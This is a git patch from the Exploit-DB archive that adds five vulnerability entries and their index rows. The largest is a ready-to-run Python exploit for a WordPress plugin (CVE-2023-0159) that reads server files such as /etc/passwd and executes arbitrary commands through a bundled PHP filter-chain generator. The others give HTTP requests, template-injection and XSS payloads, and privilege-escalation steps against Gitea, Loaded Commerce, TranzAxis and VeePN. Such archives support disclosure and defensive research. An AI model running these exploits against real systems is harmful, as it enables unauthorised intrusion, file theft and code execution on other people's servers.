From 04fa5ba95dca9caf5528c27a0840391c671908f2 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Thu, 20 Mar 2025 00:16:32 +0000 Subject: [PATCH] DB: 2025-03-20 6 changes to exploits/shellcodes/ghdb Gitea 1.24.0 - HTML Injection Extensive VC Addons for WPBakery page builder 1.9.0 - Remote Code Execution (RCE) Loaded Commerce 6.6 - Client-Side Template Injection(CSTI) TranzAxis 3.2.41.10.26 - Stored Cross-Site Scripting (XSS) (Authenticated) VeeVPN 1.6.1 - Unquoted Service Path --- exploits/multiple/webapps/52087.txt | 45 +++++ exploits/php/webapps/52084.txt | 15 ++ exploits/php/webapps/52085.py | 249 ++++++++++++++++++++++++++++ exploits/php/webapps/52086.txt | 19 +++ exploits/windows/local/52088.txt | 31 ++++ files_exploits.csv | 5 + 6 files changed, 364 insertions(+) create mode 100644 exploits/multiple/webapps/52087.txt create mode 100644 exploits/php/webapps/52084.txt create mode 100755 exploits/php/webapps/52085.py create mode 100644 exploits/php/webapps/52086.txt create mode 100644 exploits/windows/local/52088.txt diff --git a/exploits/multiple/webapps/52087.txt b/exploits/multiple/webapps/52087.txt new file mode 100644 index 000000000..c56ca9c53 --- /dev/null +++ b/exploits/multiple/webapps/52087.txt @@ -0,0 +1,45 @@ +# Exploit Title: Gitea 1.24.0 - HTML Injection +# Date: 2025-03-09 +# Exploit Author: Mikail KOCADAĞ +# Vendor Homepage: https://gitea.com +# Software Link: https://dl.gitea.io/gitea/1.24.0/ +# Version: 1.24.0 +# Tested on: Windows 10, Linux Ubuntu 22.04 +# CVE : N/A + +## Vulnerability Description: +In Gitea 1.24.0, the "description" parameter on the user settings page is vulnerable to HTML Injection and potentially Reflected XSS. The user-supplied HTML content is not properly sanitized, allowing it to be executed in the browser. When a user saves their profile description containing malicious HTML or JavaScript code, the payload successfully executes, confirming the vulnerability. + +## Exploit PoC: +[https://lh7-rt.googleusercontent.com/docsz/AD_4nXeh7FQb3EdM3-fPqRLqZ4Oh5JlVQdHjhBHEtPL5U9mEtTeWwiMdfx1SpyYC-Kg7EiWCy-Mpay8ZKz6WDw5hCYLrbCrAN2Dlg5xAnNIMuL9ui8ZNjH9GzD_rwdtjbGRkyoTP-uAd?key=pDzgPVQKg3NL0T6shAZ0U6Xz][https://lh7-rt.googleusercontent.com/docsz/AD_4nXc-OZUDyqxfXQV92GwjmahRYFv7BzYhJ5lG2F6slXNyRVRcgyB2yNbK_NMkFkWbU6IggK4xOkUDP5aukMiEjFS18zIc3DDUR7M0wivQMF2aWRt91yx_ayb7AB556Uot1LVUaa1z8w?key=pDzgPVQKg3NL0T6shAZ0U6Xz] + +## Paload:

deneme

+### **1. Request:** +POST /user/settings HTTP/2 +Host: demo.gitea.com +Cookie: _gid=GA1.2.1249205656.1740139988; _ga=GA1.2.291185928.1740139987; i_like_gitea=d9da795e317a0ced; lang=tr-TR; _ga_WBKVZF2YXD=GS1.1.1740139987.1.1.1740140041.6.0.0; _csrf=f9ITrnNQIzvSX-yvHX64qhoc_8w6MTc0MDE0MDY0MDQ2MTE0MDgyMQ +Content-Length: 312 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Accept-Language: tr-TR,tr;q=0.9 +Origin: null +Content-Type: application/x-www-form-urlencoded +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate, br +Priority: u=0, i + +_csrf=f9ITrnNQIzvSX-yvHX64qhoc_8w6MTc0MDE0MDY0MDQ2MTE0MDgyMQ +&full_name=Abuzettin +&description=%3Ch1%3Edeneme%3C%2Fh1%3E +&website= +&location= +&visibility=0 +&keep_email_private=on \ No newline at end of file diff --git a/exploits/php/webapps/52084.txt b/exploits/php/webapps/52084.txt new file mode 100644 index 000000000..2e9933da3 --- /dev/null +++ b/exploits/php/webapps/52084.txt @@ -0,0 +1,15 @@ +# Exploit Title: Loaded Commerce 6.6 Client-Side Template Injection(CSTI) +# Date: 03/13/2025 +# Exploit Author: tmrswrr +# Vendor Homepage: https://loadedcommerce.com/ +# Version: 6.6 +# Tested on: https://www.softaculous.com/apps/ecommerce/Loaded_Commerce + +Injecting {{7*7}} into the search parameter +https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core%2Fadvanced_search_result&keywords={{7*7}} +returns 49, confirming a template injection vulnerability. + +Forgot Password: +Submitting {{constructor.constructor('alert(1)')()}} in the email field on the "Forgot Password" page +https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core/password_forgotten&action=process +triggers an alert, demonstrating client-side code execution. \ No newline at end of file diff --git a/exploits/php/webapps/52085.py b/exploits/php/webapps/52085.py new file mode 100755 index 000000000..0328b4f83 --- /dev/null +++ b/exploits/php/webapps/52085.py @@ -0,0 +1,249 @@ +# Exploit Title: Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE +# Date: 12 march 2025 +# Exploit Author: Ravina +# Vendor Homepage: wprealize +# Version: 1.9.1 +# Tested on: windows, linux +# CVE ID : CVE-2023-0159 +# Vulnerability Type: Remote Code Execution + +------------------------------------------------ +# CVE-2023-0159_scan.py + +#!/usr/bin/env python3 +# LFI: ./exploit.py --mode lfi --target https://vuln-site.com --file /etc/passwd +# RCE: ./exploit.py --mode rce --target https://vuln-site.com --command "id" --generator /path/to/php_filter_chain_generator.py + +import argparse +import requests +import base64 +import subprocess +import time +import php_filter_chain_generator + +def run_lfi(target, file_path): + url = f"{target}/wp-admin/admin-ajax.php" + payload = { + 'action': 'extensive_vc_init_shortcode_pagination', + 'options[template]': f'php://filter/convert.base64-encode/resource={file_path}' + } + + try: + response = requests.post(url, data=payload) + if response.status_code == 200 and '{"status":"success","message":"Items are loaded","data":' in response.text: + try: + json_data = response.json() + base64_content = json_data['data']['items'] + decoded = base64.b64decode(base64_content).decode() + print(f"\n[+] Successfully read {file_path}:\n") + print(decoded) + except Exception as e: + print(f"[-] Decoding failed: {str(e)}") + print(f"Raw response (truncated): {response.text[:500]}...") + else: + print(f"[-] LFI failed (Status: {response.status_code})") + except Exception as e: + print(f"[-] Request failed: {str(e)}") + +def run_rce(target, command, generator_path): + # Base64 encode command to handle special characters + encoded_cmd = base64.b64encode(command.encode()).decode() + php_code = f'' + + # Generate filter chain + try: + result = subprocess.run( + [generator_path, '--chain', php_code], + capture_output=True, + text=True, + check=True + ) + payload = None + for line in result.stdout.split('\n'): + if line.startswith('php://filter'): + payload = line.strip() + break + + if not payload: + print("[-] Failed to generate payload") + return + + url = f"{target}/wp-admin/admin-ajax.php" + data = {'action': 'extensive_vc_init_shortcode_pagination', 'options[template]': payload} + + print(f"[*] Sending payload for command: {command}") + start_time = time.time() + # Send the request to attempt RCE and dont forget to pass the generator path + response = requests.post(url, data=data) + elapsed = time.time() - start_time + + print(f"\n[+] Response time: {elapsed:.2f} seconds") + print(f"[+] Status code: {response.status_code}") + + if response.status_code == 200: + print("\n[+] Response content:") + print(response.text[:1000] + ("..." if len(response.text) > 1000 else "")) + + except subprocess.CalledProcessError as e: + print(f"[-] Filter chain generator failed: {e.stderr}") + except FileNotFoundError: + print(f"[-] Generator not found at {generator_path}") + except Exception as e: + print(f"[-] RCE failed: {str(e)}") + +def main(): + parser = argparse.ArgumentParser(description="CVE-2023-0159 Exploit Script") + parser.add_argument("--mode", choices=["lfi", "rce"], required=True, help="Exploit mode") + parser.add_argument("--target", required=True, help="Target URL (e.g., https://example.com)") + parser.add_argument("--file", help="File path for LFI mode") + parser.add_argument("--command", help="Command to execute for RCE mode") + parser.add_argument("--generator", default="php_filter_chain_generator.py", + help="Path to php_filter_chain_generator.py") + + args = parser.parse_args() + + if args.mode == "lfi": + if not args.file: + print("[-] Missing --file argument for LFI mode") + return + run_lfi(args.target.rstrip('/'), args.file) + elif args.mode == "rce": + if not args.command: + print("[-] Missing --command argument for RCE mode") + return + run_rce(args.target.rstrip('/'), args.command, args.generator) + +if __name__ == "__main__": + main() + +------------------------------------------ + +# php_filter_chain_generator.py + +#!/usr/bin/env python3 +import argparse +import base64 +import re + + +# No need to guess a valid filename anymore +file_to_use = "php://temp" + +conversions = { + '0': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2', + '1': 'convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4', + '2': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921', + '3': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE', + '4': 'convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE', + '5': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2', + '6': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.CSIBM943.UCS4|convert.iconv.IBM866.UCS-2', + '7': 'convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4', + '8': 'convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2', + '9': 'convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB', + 'A': 'convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213', + 'a': 'convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE', + 'B': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000', + 'b': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE', + 'C': 'convert.iconv.UTF8.CSISO2022KR', + 'c': 'convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2', + 'D': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213', + 'd': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5', + 'E': 'convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT', + 'e': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UTF16.EUC-JP-MS|convert.iconv.ISO-8859-1.ISO_6937', + 'F': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB', + 'f': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213', + 'g': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8', + 'G': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90', + 'H': 'convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213', + 'h': 'convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE', + 'I': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213', + 'i': 'convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000', + 'J': 'convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4', + 'j': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16', + 'K': 'convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE', + 'k': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2', + 'L': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.R9.ISO6937|convert.iconv.OSF00010100.UHC', + 'l': 'convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE', + 'M':'convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T', + 'm':'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949', + 'N': 'convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4', + 'n': 'convert.iconv.ISO88594.UTF16|convert.iconv.IBM5347.UCS4|convert.iconv.UTF32BE.MS936|convert.iconv.OSF00010004.T.61', + 'O': 'convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775', + 'o': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE', + 'P': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB', + 'p': 'convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4', + 'q': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.GBK.CP932|convert.iconv.BIG5.UCS2', + 'Q': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2', + 'R': 'convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4', + 'r': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.ISO-IR-99.UCS-2BE|convert.iconv.L4.OSF00010101', + 'S': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS', + 's': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90', + 'T': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103', + 't': 'convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS', + 'U': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943', + 'u': 'convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61', + 'V': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB', + 'v': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.ISO-8859-14.UCS2', + 'W': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936', + 'w': 'convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE', + 'X': 'convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932', + 'x': 'convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS', + 'Y': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361', + 'y': 'convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT', + 'Z': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16', + 'z': 'convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937', + '/': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4', + '+': 'convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157', + '=': '' +} + +def generate_filter_chain(chain, debug_base64 = False): + + encoded_chain = chain + # generate some garbage base64 + filters = "convert.iconv.UTF8.CSISO2022KR|" + filters += "convert.base64-encode|" + # make sure to get rid of any equal signs in both the string we just generated and the rest of the file + filters += "convert.iconv.UTF8.UTF7|" + + + for c in encoded_chain[::-1]: + filters += conversions[c] + "|" + # decode and reencode to get rid of everything that isn't valid base64 + filters += "convert.base64-decode|" + filters += "convert.base64-encode|" + # get rid of equal signs + filters += "convert.iconv.UTF8.UTF7|" + if not debug_base64: + # don't add the decode while debugging chains + filters += "convert.base64-decode" + + final_payload = f"php://filter/{filters}/resource={file_to_use}" + return final_payload + +def main(): + + # Parsing command line arguments + parser = argparse.ArgumentParser(description="PHP filter chain generator.") + + parser.add_argument("--chain", help="Content you want to generate. (you will maybe need to pad with spaces for your payload to work)", required=False) + parser.add_argument("--rawbase64", help="The base64 value you want to test, the chain will be printed as base64 by PHP, useful to debug.", required=False) + args = parser.parse_args() + if args.chain is not None: + chain = args.chain.encode('utf-8') + base64_value = base64.b64encode(chain).decode('utf-8').replace("=", "") + chain = generate_filter_chain(base64_value) + print("[+] The following gadget chain will generate the following code : {} (base64 value: {})".format(args.chain, base64_value)) + print(chain) + if args.rawbase64 is not None: + rawbase64 = args.rawbase64.replace("=", "") + match = re.search("^([A-Za-z0-9+/])*$", rawbase64) + if (match): + chain = generate_filter_chain(rawbase64, True) + print(chain) + else: + print ("[-] Base64 string required.") + exit(1) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/52086.txt b/exploits/php/webapps/52086.txt new file mode 100644 index 000000000..54ab2fac8 --- /dev/null +++ b/exploits/php/webapps/52086.txt @@ -0,0 +1,19 @@ +Exploit Title: TranzAxis 3.2.41.10.26 - Stored Cross-Site Scripting (XSS) (Authenticated) +Date: 10th, March, 2025 +Exploit Author: ABABANK REDTEAM +Vendor Homepage: https://compassplustechnologies.com/ +Version: 3.2.41.10.26 +Tested on: Window Server 2016 + +1. Login to web application +2. Click on `Entire System` goto `Monitoring` then click on `Terminals +Monitoring` +3. Select any name below `Terminals Monitoring` then click on `Open Object +in Tree` +4. Select on Filter then supply with any filter name then click `Apply +Filter` +5. On the right side select on `Save Settings in Explorer Tree`, on the +`Enter Explorer Item Title` supply the payload then click OK. + +Payload: \ No newline at end of file diff --git a/exploits/windows/local/52088.txt b/exploits/windows/local/52088.txt new file mode 100644 index 000000000..3a6547c10 --- /dev/null +++ b/exploits/windows/local/52088.txt @@ -0,0 +1,31 @@ +# Exploit Title: VeeVPN 1.6.1 - 'VeePNService' Unquoted Service Path +# Date: 2024-12-27 +# Exploit Author: Doğukan Orhan +# Vendor Homepage: https://veepn.com/ +# Version: 1.6.1 +# Tested on: Windows 10 Pro x64 + + +# Step to discover Unquoted Service Path: + +C:\Users\PC>wmic service where 'name like "%VeePNService%"' get name, displayname, pathname, startmode, startname + +#Service Info + +C:\Users\PC>sc qc VeePNService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: VeePNService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\VeePN\service\VeePNService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : VeePNService + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +# Exploit: + +This vulnerability could permit executing code during startup or reboot with the escalated privileges. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 51af04e6b..0057c66bb 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11916,6 +11916,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49571,exploits/multiple/webapps/49571.py,"Gitea 1.12.5 - Remote Code Execution (Authenticated)",2021-02-18,Podalirius,webapps,multiple,,2021-02-18,2021-06-14,0,,,,,, 51009,exploits/multiple/webapps/51009.rb,"Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)",2022-09-15,samguy,webapps,multiple,,2022-09-15,2023-08-02,1,CVE-2022-30781,,,,, 52077,exploits/multiple/webapps/52077.txt,"Gitea 1.22.0 - Stored XSS",2024-08-28,"Catalin Iovita_ Alexandru Postolache",webapps,multiple,,2024-08-28,2024-08-28,0,,,,,, +52087,exploits/multiple/webapps/52087.txt,"Gitea 1.24.0 - HTML Injection",2025-03-19,"Mikail KOCADAĞ",webapps,multiple,,2025-03-19,2025-03-19,0,,,,,, 44996,exploits/multiple/webapps/44996.py,"Gitea 1.4.0 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,multiple,,2018-07-10,2018-07-10,0,,,,,,https://security.szurek.pl/gitea-1-4-0-unauthenticated-rce.html 49383,exploits/multiple/webapps/49383.py,"Gitea 1.7.5 - Remote Code Execution",2021-01-06,1F98D,webapps,multiple,,2021-01-06,2021-04-01,1,CVE-2019-11229,,,,, 42392,exploits/multiple/webapps/42392.py,"GitHub Enterprise < 2.8.7 - Remote Code Execution",2017-03-15,orange,webapps,multiple,,2017-07-29,2017-07-29,0,,,,,,http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html @@ -18291,6 +18292,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 37781,exploits/php/webapps/37781.txt,"Extcalendar 2.0 - Multiple SQL Injections / HTML Injection Vulnerabilities",2012-09-05,"Ashiyane Digital Security Team",webapps,php,,2012-09-05,2015-08-16,1,OSVDB-126531;OSVDB-126530,,,,,https://www.securityfocus.com/bid/55424/info 17321,exploits/php/webapps/17321.txt,"Extcalendar 2.0b2 - 'cal_search.php' SQL Injection",2011-05-25,"High-Tech Bridge SA",webapps,php,,2011-05-25,2011-05-25,0,,,,,http://www.exploit-db.comextcal2.0_b2.zip,http://www.htbridge.ch/advisory/sql_injection_in_extcalendar_2.html 17562,exploits/php/webapps/17562.php,"ExtCalendar2 - Cookie Authentication Bypass / Backdoor Upload",2011-07-23,Lagripe-Dz,webapps,php,,2011-07-23,2017-10-20,0,,,,,http://www.exploit-db.comextcal2.0_b2.zip, +52085,exploits/php/webapps/52085.py,"Extensive VC Addons for WPBakery page builder 1.9.0 - Remote Code Execution (RCE)",2025-03-19,Ravina,webapps,php,,2025-03-19,2025-03-19,0,CVE-2023-0159,,,,, 39816,exploits/php/webapps/39816.php,"eXtplorer 2.1.9 - '.ZIP' Directory Traversal",2016-05-16,hyp3rlinx,webapps,php,,2016-05-16,2016-05-16,0,CVE-2016-4313,,,,http://www.exploit-db.comeXtplorer_2.1.9.zip,http://hyp3rlinx.altervista.org/advisories/EXTPLORER-ARCHIVE-PATH-TRAVERSAL.txt 51067,exploits/php/webapps/51067.txt,"eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE)",2023-03-27,ErPaciocco,webapps,php,,2023-03-27,2023-03-27,0,,,,,, 7525,exploits/php/webapps/7525.txt,"Extract Website - 'Filename' File Disclosure",2008-12-19,"Cold Zero",webapps,php,,2008-12-18,2017-01-05,1,OSVDB-50915;CVE-2008-6334,,,,, @@ -22820,6 +22822,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 35444,exploits/php/webapps/35444.txt,"Lms Web Ensino - Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,webapps,php,,2011-03-04,2014-12-03,1,,,,,,https://www.securityfocus.com/bid/46829/info 6601,exploits/php/webapps/6601.txt,"LnBlog 0.9.0 - 'plugin' Local File Inclusion",2008-09-27,dun,webapps,php,,2008-09-26,2016-12-23,1,OSVDB-48613;CVE-2008-4712,,,,http://www.exploit-db.comLnBlog-0.9.0.zip, 45758,exploits/php/webapps/45758.py,"Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution",2018-10-31,"Jakub Palaczynski",webapps,php,,2018-10-31,2018-10-31,0,,"Cross-Site Scripting (XSS)",,,, +52084,exploits/php/webapps/52084.txt,"Loaded Commerce 6.6 - Client-Side Template Injection(CSTI)",2025-03-19,tmrswrr,webapps,php,,2025-03-19,2025-03-19,0,,,,,, 34552,exploits/php/webapps/34552.txt,"LoadedCommerce7 - Systemic Query Factory",2014-09-07,Breaking.Technology,webapps,php,,2014-09-08,2014-09-08,0,CVE-2014-5140;OSVDB-111211,,,,,http://breaking.technology/advisories/CVE-2014-5140.txt 48909,exploits/php/webapps/48909.txt,"Loan Management System 1.0 - Multiple Cross Site Scripting (Stored)",2020-10-20,"Akıner Kısa",webapps,php,,2020-10-20,2020-10-20,0,,,,,, 50402,exploits/php/webapps/50402.txt,"Loan Management System 1.0 - SQLi Authentication Bypass",2021-10-08,"Merve Oral",webapps,php,,2021-10-08,2021-10-08,0,,,,,, @@ -31259,6 +31262,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 11155,exploits/php/webapps/11155.txt,"Transload Script - Arbitrary File Upload",2010-01-16,DigitALL,webapps,php,,2010-01-15,,1,,,,,http://www.exploit-db.comtransloader.zip, 6360,exploits/php/webapps/6360.txt,"TransLucid 1.75 - 'FCKeditor' Arbitrary File Upload",2008-09-03,BugReport.IR,webapps,php,,2008-09-02,,1,OSVDB-49430,,,,,http://www.bugreport.ir/index_51.htm 8943,exploits/php/webapps/8943.txt,"TransLucid 1.75 - Multiple Vulnerabilities",2009-06-12,intern0t,webapps,php,,2009-06-11,2016-12-21,1,OSVDB-55385;CVE-2009-2145;OSVDB-55384;OSVDB-55383,,,,,http://forum.intern0t.net/intern0t-advisories/1122-intern0t-translucid-1-75-multiple-vulnerabilities.html +52086,exploits/php/webapps/52086.txt,"TranzAxis 3.2.41.10.26 - Stored Cross-Site Scripting (XSS) (Authenticated)",2025-03-19,"ABABANK REDTEAM",webapps,php,,2025-03-19,2025-03-19,0,,,,,, 36175,exploits/php/webapps/36175.txt,"Traq 2.2 - Multiple SQL Injections / Cross-Site Scripting",2011-09-28,"High-Tech Bridge SA",webapps,php,,2011-09-28,2015-02-25,1,,,,,,https://www.securityfocus.com/bid/49835/info 18213,exploits/php/webapps/18213.php,"Traq 2.3 - Authentication Bypass / Remote Code Execution",2011-12-07,EgiX,webapps,php,,2011-12-07,2011-12-14,1,OSVDB-77556,,,,http://www.exploit-db.comtraq-v2.3.zip, 18239,exploits/php/webapps/18239.rb,"Traq 2.3 - Authentication Bypass / Remote Code Execution (Metasploit)",2011-12-13,Metasploit,webapps,php,,2011-12-14,2011-12-14,1,OSVDB-77556,"Metasploit Framework (MSF)",,,, @@ -41948,6 +41952,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31991,exploits/windows/local/31991.rb,"VCDGear 3.50 - '.cue' Local Stack Buffer Overflow",2014-02-28,Provensec,local,windows,,2014-02-28,2014-03-03,1,CVE-2007-2568;OSVDB-36178,,,http://www.exploit-db.com/screenshots/idlt32000/screen-shot-2014-03-03-at-122355.png,http://www.exploit-db.comvcdgear350.zip, 3727,exploits/windows/local/3727.c,"VCDGear 3.56 Build 050213 - 'FILE' Local Code Execution",2007-04-13,InTeL,local,windows,,2007-04-12,2016-09-30,1,OSVDB-34968;CVE-2007-2062,,,,http://www.exploit-db.comvcdgear356_050213beta.zip, 19678,exploits/windows/local/19678.c,"VDOLive Player 3.0.2 - Local Buffer Overflow",1999-12-13,UNYUN,local,windows,,1999-12-13,2012-07-08,1,CVE-1999-1007;OSVDB-1164,,,,,https://www.securityfocus.com/bid/872/info +52088,exploits/windows/local/52088.txt,"VeeVPN 1.6.1 - Unquoted Service Path",2025-03-19,"Doğukan Orhan",local,windows,,2025-03-19,2025-03-19,0,,,,,, 49641,exploits/windows/local/49641.txt,"Vembu BDR 4.2.0.1 U1 - Multiple Unquoted Service Paths",2021-03-12,"Mohammed Alshehri",local,windows,,2021-03-12,2021-03-12,0,,,,,, 40582,exploits/windows/local/40582.txt,"Vembu StoreGrid 4.0 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",local,windows,,2016-10-19,2016-10-19,0,,,,,, 38095,exploits/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - Local Buffer Overflow (SEH/ToLower() Bypass)",2015-09-07,"Robbie Corley",local,windows,,2015-09-07,2015-09-07,1,OSVDB-127268,,,,,